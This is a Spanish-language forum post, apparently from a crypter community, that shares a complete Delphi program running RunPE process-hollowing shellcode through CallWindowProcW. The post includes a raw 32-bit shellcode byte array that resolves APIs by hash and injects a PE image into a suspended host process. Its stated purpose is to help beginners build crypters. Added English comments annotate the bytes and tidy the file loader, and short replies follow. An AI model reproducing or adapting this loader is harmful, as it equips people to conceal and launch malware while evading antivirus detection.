Hola chicos, desde hace unos días quería hacer funcionar este RunPE http://www.indetectables.net/viewtopic.php?p=428636 y, como era novato con la función CallWindowProcW, pensaba que tenía un uso raro y misterioso, más aún cuando se trata de ejecutar el shellcode de un RunPE.

Pregunté a varios compañeros del foro cómo hacerlo andar hasta que el compadre joselin me puso los pies en la tierra y compartió código. Ahí entendí que estaba pasando el segundo parámetro de la función (donde va la ruta del ejecutable) como si fuera una cadena ASCII y no como Unicode (UTF-16, es decir un PWideChar terminado en cero). Esa tontería me volvía loco, pero cuando uno es nuevo y no sabe cómo funciona algo, cuesta.

Así que, sin más que decir, les traigo cómo utilizar un shellcode en Delphi, porque aunque existen varios códigos publicados pocos hablan de cómo usarlos, principalmente en Delphi. Agradezco también a pink, que ha publicado varios shellcode y en uno de ellos venía su funcionamiento, en el cual también me basé. Esto es para que si algún chico nuevo quiere hacer su crypter usando shellcode lo tenga más fácil.
uses
  SysUtils,windows;

//RunPE shellcode, 32-bit x86 only (it starts with pushad and reads the PEB via
//fs:[30h]). It is entered through CallWindowProcW, i.e. as a stdcall WNDPROC:
//  runPE(path: pwidechar; bufferExe: pointer): cardinal
//  path      - NUL-terminated UTF-16 path of the host process to spawn; arrives
//              in the hWnd slot. It MUST be wide: passing an ANSI string here is
//              the bug this post is about.
//  bufferExe - pointer to the raw bytes of the PE image to map into the host;
//              arrives in the Msg slot. The caller passes 0 for wParam/lParam.
//What the bytes show:
//  - the opening call/pop gives the code a pointer to the data area right after
//    it: the UTF-16 strings "kernel32" (offset 0) and "ntdll" (offset $12),
//    followed by zeroed slots used as locals (e.g. $42 = path, $3E = bufferExe,
//    $4A = saved esp, restored just before the final popad/ret).
//  - the helper near the end walks the PEB loader module list
//    (fs:[30h] -> +0Ch -> +1Ch) and returns the base of the module whose name is
//    12 wide chars long and starts with 'k' or 'K', i.e. kernel32.dll.
//  - the last helper walks a module's export table and matches names with a
//    ROR-13/add hash (ror edi,0Dh; add edi,eax). The 32-bit constants pushed
//    before each resolver call (e.g. $CF14E85B, $16B3FE88) are such hashes;
//    which API each one names cannot be recovered from this listing alone.
//  - the ten-argument call that pushes 4 (CREATE_SUSPENDED) with the path is
//    consistent with CreateProcessW; the block pushing $40/$1000 is consistent
//    with VirtualAlloc(..., MEM_COMMIT, PAGE_EXECUTE_READWRITE) — TODO confirm.
//NOTE(review): the caller executes these bytes in place, out of a const in the
//image's data section; with DEP enabled that page is not executable. The image
//in bufferExe is not validated: e_lfanew ([buffer+3Ch]) is used unchecked, so a
//truncated or hostile image can make the code read outside the buffer.
Const
  Shell: Array [0 .. 1287] Of Byte = ($60, $E8, $4E, $00, $00, $00, $6B, $00, $65, $00, $72, $00, $6E, $00, $65, $00, $6C, $00, $33, $00, $32, $00, $00, $00, $6E, $00, $74, $00, $64, $00, $6C, $00,
    $6C, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
    $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $5B, $8B, $FC, $6A, $42, $E8, $BB, $03, $00, $00, $8B, $54, $24, $28, $89, $11, $8B, $54, $24, $2C, $6A, $3E, $E8, $AA, $03, $00,
    $00, $89, $11, $6A, $4A, $E8, $A1, $03, $00, $00, $89, $39, $6A, $1E, $6A, $3C, $E8, $9D, $03, $00, $00, $6A, $22, $68, $F4, $00, $00, $00, $E8, $91, $03, $00, $00, $6A, $26, $6A, $24, $E8, $88,
    $03, $00, $00, $6A, $2A, $6A, $40, $E8, $7F, $03, $00, $00, $6A, $2E, $6A, $0C, $E8, $76, $03, $00, $00, $6A, $32, $68, $C8, $00, $00, $00, $E8, $6A, $03, $00, $00, $6A, $2A, $E8, $5C, $03, $00,
    $00, $8B, $09, $C7, $01, $44, $00, $00, $00, $6A, $12, $E8, $4D, $03, $00, $00, $68, $5B, $E8, $14, $CF, $51, $E8, $79, $03, $00, $00, $6A, $3E, $E8, $3B, $03, $00, $00, $8B, $D1, $6A, $1E, $E8,
    $32, $03, $00, $00, $6A, $40, $FF, $32, $FF, $31, $FF, $D0, $6A, $12, $E8, $23, $03, $00, $00, $68, $5B, $E8, $14, $CF, $51, $E8, $4F, $03, $00, $00, $6A, $1E, $E8, $11, $03, $00, $00, $8B, $09,
    $8B, $51, $3C, $6A, $3E, $E8, $05, $03, $00, $00, $8B, $39, $03, $FA, $6A, $22, $E8, $FA, $02, $00, $00, $8B, $09, $68, $F8, $00, $00, $00, $57, $51, $FF, $D0, $6A, $00, $E8, $E8, $02, $00, $00,
    $68, $88, $FE, $B3, $16, $51, $E8, $14, $03, $00, $00, $6A, $2E, $E8, $D6, $02, $00, $00, $8B, $39, $6A, $2A, $E8, $CD, $02, $00, $00, $8B, $11, $6A, $42, $E8, $C4, $02, $00, $00, $57, $52, $6A,
    $00, $6A, $00, $6A, $04, $6A, $00, $6A, $00, $6A, $00, $6A, $00, $FF, $31, $FF, $D0, $6A, $12, $E8, $A9, $02, $00, $00, $68, $D0, $37, $10, $F2, $51, $E8, $D5, $02, $00, $00, $6A, $22, $E8, $97,
    $02, $00, $00, $8B, $11, $6A, $2E, $E8, $8E, $02, $00, $00, $8B, $09, $FF, $72, $34, $FF, $31, $FF, $D0, $6A, $00, $E8, $7E, $02, $00, $00, $68, $9C, $95, $1A, $6E, $51, $E8, $AA, $02, $00, $00,
    $6A, $22, $E8, $6C, $02, $00, $00, $8B, $11, $8B, $39, $6A, $2E, $E8, $61, $02, $00, $00, $8B, $09, $6A, $40, $68, $00, $30, $00, $00, $FF, $72, $50, $FF, $77, $34, $FF, $31, $FF, $D0, $6A, $36,
    $E8, $47, $02, $00, $00, $8B, $D1, $6A, $22, $E8, $3E, $02, $00, $00, $8B, $39, $6A, $3E, $E8, $35, $02, $00, $00, $8B, $31, $6A, $22, $E8, $2C, $02, $00, $00, $8B, $01, $6A, $2E, $E8, $23, $02,
    $00, $00, $8B, $09, $52, $FF, $77, $54, $56, $FF, $70, $34, $FF, $31, $6A, $00, $E8, $10, $02, $00, $00, $68, $A1, $6A, $3D, $D8, $51, $E8, $3C, $02, $00, $00, $83, $C4, $0C, $FF, $D0, $6A, $12,
    $E8, $F9, $01, $00, $00, $68, $5B, $E8, $14, $CF, $51, $E8, $25, $02, $00, $00, $6A, $22, $E8, $E7, $01, $00, $00, $8B, $11, $83, $C2, $06, $6A, $3A, $E8, $DB, $01, $00, $00, $6A, $02, $52, $51,
    $FF, $D0, $6A, $36, $E8, $CE, $01, $00, $00, $C7, $01, $00, $00, $00, $00, $B8, $28, $00, $00, $00, $6A, $36, $E8, $BC, $01, $00, $00, $F7, $21, $6A, $1E, $E8, $B3, $01, $00, $00, $8B, $11, $8B,
    $52, $3C, $81, $C2, $F8, $00, $00, $00, $03, $D0, $6A, $3E, $E8, $9F, $01, $00, $00, $03, $11, $6A, $26, $E8, $96, $01, $00, $00, $6A, $28, $52, $FF, $31, $6A, $12, $E8, $8A, $01, $00, $00, $68,
    $5B, $E8, $14, $CF, $51, $E8, $B6, $01, $00, $00, $83, $C4, $0C, $FF, $D0, $6A, $26, $E8, $73, $01, $00, $00, $8B, $39, $8B, $09, $8B, $71, $14, $6A, $3E, $E8, $65, $01, $00, $00, $03, $31, $6A,
    $26, $E8, $5C, $01, $00, $00, $8B, $09, $8B, $51, $0C, $6A, $22, $E8, $50, $01, $00, $00, $8B, $09, $03, $51, $34, $6A, $46, $E8, $44, $01, $00, $00, $8B, $C1, $6A, $2E, $E8, $3B, $01, $00, $00,
    $8B, $09, $50, $FF, $77, $10, $56, $52, $FF, $31, $6A, $00, $E8, $2A, $01, $00, $00, $68, $A1, $6A, $3D, $D8, $51, $E8, $56, $01, $00, $00, $83, $C4, $0C, $FF, $D0, $6A, $36, $E8, $13, $01, $00,
    $00, $8B, $11, $83, $C2, $01, $89, $11, $6A, $3A, $E8, $05, $01, $00, $00, $8B, $09, $3B, $CA, $0F, $85, $33, $FF, $FF, $FF, $6A, $32, $E8, $F4, $00, $00, $00, $8B, $09, $C7, $01, $07, $00, $01,
    $00, $6A, $00, $E8, $E5, $00, $00, $00, $68, $D2, $C7, $A7, $68, $51, $E8, $11, $01, $00, $00, $6A, $32, $E8, $D3, $00, $00, $00, $8B, $11, $6A, $2E, $E8, $CA, $00, $00, $00, $8B, $09, $52, $FF,
    $71, $04, $FF, $D0, $6A, $22, $E8, $BB, $00, $00, $00, $8B, $39, $83, $C7, $34, $6A, $32, $E8, $AF, $00, $00, $00, $8B, $31, $8B, $B6, $A4, $00, $00, $00, $83, $C6, $08, $6A, $2E, $E8, $9D, $00,
    $00, $00, $8B, $11, $6A, $46, $E8, $94, $00, $00, $00, $51, $6A, $04, $57, $56, $FF, $32, $6A, $00, $E8, $86, $00, $00, $00, $68, $A1, $6A, $3D, $D8, $51, $E8, $B2, $00, $00, $00, $83, $C4, $0C,
    $FF, $D0, $6A, $22, $E8, $6F, $00, $00, $00, $8B, $09, $8B, $51, $28, $03, $51, $34, $6A, $32, $E8, $60, $00, $00, $00, $8B, $09, $81, $C1, $B0, $00, $00, $00, $89, $11, $6A, $00, $E8, $4F, $00,
    $00, $00, $68, $D3, $C7, $A7, $E8, $51, $E8, $7B, $00, $00, $00, $6A, $32, $E8, $3D, $00, $00, $00, $8B, $D1, $6A, $2E, $E8, $34, $00, $00, $00, $8B, $09, $FF, $32, $FF, $71, $04, $FF, $D0, $6A,
    $00, $E8, $24, $00, $00, $00, $68, $88, $3F, $4A, $9E, $51, $E8, $50, $00, $00, $00, $6A, $2E, $E8, $12, $00, $00, $00, $8B, $09, $FF, $71, $04, $FF, $D0, $6A, $4A, $E8, $04, $00, $00, $00, $8B,
    $21, $61, $C3, $8B, $CB, $03, $4C, $24, $04, $C3, $6A, $00, $E8, $F2, $FF, $FF, $FF, $68, $54, $CA, $AF, $91, $51, $E8, $1E, $00, $00, $00, $6A, $40, $68, $00, $10, $00, $00, $FF, $74, $24, $18,
    $6A, $00, $FF, $D0, $FF, $74, $24, $14, $E8, $CF, $FF, $FF, $FF, $89, $01, $83, $C4, $10, $C3, $E8, $22, $00, $00, $00, $68, $A4, $4E, $0E, $EC, $50, $E8, $4B, $00, $00, $00, $83, $C4, $08, $FF,
    $74, $24, $04, $FF, $D0, $FF, $74, $24, $08, $50, $E8, $38, $00, $00, $00, $83, $C4, $08, $C3, $55, $52, $51, $53, $56, $57, $33, $C0, $64, $8B, $70, $30, $8B, $76, $0C, $8B, $76, $1C, $8B, $6E,
    $08, $8B, $7E, $20, $8B, $36, $38, $47, $18, $75, $F3, $80, $3F, $6B, $74, $07, $80, $3F, $4B, $74, $02, $EB, $E7, $8B, $C5, $5F, $5E, $5B, $59, $5A, $5D, $C3, $55, $52, $51, $53, $56, $57, $8B,
    $6C, $24, $1C, $85, $ED, $74, $43, $8B, $45, $3C, $8B, $54, $28, $78, $03, $D5, $8B, $4A, $18, $8B, $5A, $20, $03, $DD, $E3, $30, $49, $8B, $34, $8B, $03, $F5, $33, $FF, $33, $C0, $FC, $AC, $84,
    $C0, $74, $07, $C1, $CF, $0D, $03, $F8, $EB, $F4, $3B, $7C, $24, $20, $75, $E1, $8B, $5A, $24, $03, $DD, $66, $8B, $0C, $4B, $8B, $5A, $1C, $03, $DD, $8B, $04, $8B, $03, $C5, $5F, $5E, $5B, $59,
    $5A, $5D, $C3, $C3, $00, $00, $00, $00);


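//Reads a whole file as raw bytes into a string (one byte per character on
//pre-Unicode Delphi). Returns '' for an empty file and raises EOSError when the
//file cannot be opened, sized or read, instead of returning garbage: the old
//version ignored the _lopen/GetFileSize/_lread results and handed the caller
//whatever happened to be in memory.
//NOTE(review): on Delphi 2009+ `string` is UTF-16, so the buffer is twice the
//file size and the bytes occupy its first half; RawByteString or TBytes would
//be the right container there. Kept as `string` so the existing caller
//(`buffer: string`) still compiles.
Function mFileToStr(Ruta: string): string;
var
  hFile: THandle;
  uBytes, uRead: DWORD;
begin
  Result := '';
  // CreateFile replaces the 16-bit-era _lopen, which cannot report sharing
  // violations and is limited to short paths.
  hFile := CreateFile(PChar(Ruta), GENERIC_READ, FILE_SHARE_READ, nil,
                      OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0);
  if hFile = INVALID_HANDLE_VALUE then
    RaiseLastOSError;
  try
    uBytes := GetFileSize(hFile, nil);
    // INVALID_FILE_SIZE ($FFFFFFFF) is both the error value and a legal size
    // for files >= 4 GiB; no PE handled here is that large, so treat it as error.
    if uBytes = INVALID_FILE_SIZE then
      RaiseLastOSError;
    if uBytes = 0 then
      Exit; // nothing to read, and @Result[1] would be nil for an empty string
    SetLength(Result, uBytes);
    if not ReadFile(hFile, Result[1], uBytes, uRead, nil) then
      RaiseLastOSError;
    // A short read means the file changed under us; do not return a buffer
    // whose tail is uninitialised memory.
    if uRead <> uBytes then
      raise Exception.CreateFmt('%s: read %d of %d bytes', [Ruta, uRead, uBytes]);
  finally
    CloseHandle(hFile);
  end;
end;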

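var
  buffer: string;                          // raw bytes of the PE handed to the shellcode
  szFilePath: array[1..1024] of widechar;  // UTF-16 path of this process (the host to spawn)
  hostPath: string;                        // file read into `buffer`
  cch: DWORD;                              // characters written by GetModuleFileNameW

begin
  // An optional first argument overrides the hard-coded image; the original
  // default is kept so the program behaves as before when run without arguments.
  if ParamCount >= 1 then
    hostPath := ParamStr(1)
  else
    hostPath := 'C:\bcb6kg.EXE';
  buffer := mFileToStr(hostPath); // read the file we want to run

  // With an empty string @buffer[1] is nil; fail here rather than inside the
  // shellcode, which dereferences the pointer without any check.
  if buffer = '' then
    raise Exception.Create('empty image: ' + hostPath);

  // GetModuleFileNameW is the Unicode equivalent of ParamStr(0). It returns 0 on
  // failure and the buffer size (path cut short) when the buffer is too small;
  // both cases are rejected before the path reaches the shellcode.
  cch := GetModuleFileNameW(0, @szFilePath[1], Length(szFilePath));
  if cch = 0 then
    RaiseLastOSError;
  if cch >= Length(szFilePath) then
    raise Exception.Create('module path too long for buffer');
  writeln(pwidechar(widestring(szFilePath))); // show the path of this executable

  // The shellcode is entered as a WNDPROC: hWnd = path (must be UTF-16; the
  // ASCII-vs-Unicode mix-up was the original bug), Msg = image bytes.
  // Caveats visible from the code itself:
  //  - both casts truncate pointers to 32 bits and the shellcode is 32-bit x86
  //    only, so this must be built as a 32-bit executable;
  //  - the bytes are executed in place from the Shell const (read-only data);
  //    under DEP that page is not executable and the call faults.
  CallWindowProcW(@shell[0],hwnd(@szFilePath[1]),cardinal(@buffer[1]),0,0);
  readln;
end.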
Saludos....
que bien crack ,
Tenía una carpeta con todo lo que había aprendido de shellcode RunPE
y no la puedo encontrar (no me acuerdo de nada; por eso guardo todo, me llevó como un mes entender cómo funcionaban).
Solo encontré ese crypter que había publicado, por suerte.

saludos

¿Qué mensaje te da al ejecutar el shellcode?
EXE: Array [0 .. 1535] Of Byte =
jaja, yo lo hice.
Parezco malo, pero soy bueno.
Gracias Pink saludos

jeje, es cierto joselin, parece que he sido penetrado.
Dejo un screenshot para quien no entienda.



Saludoss..
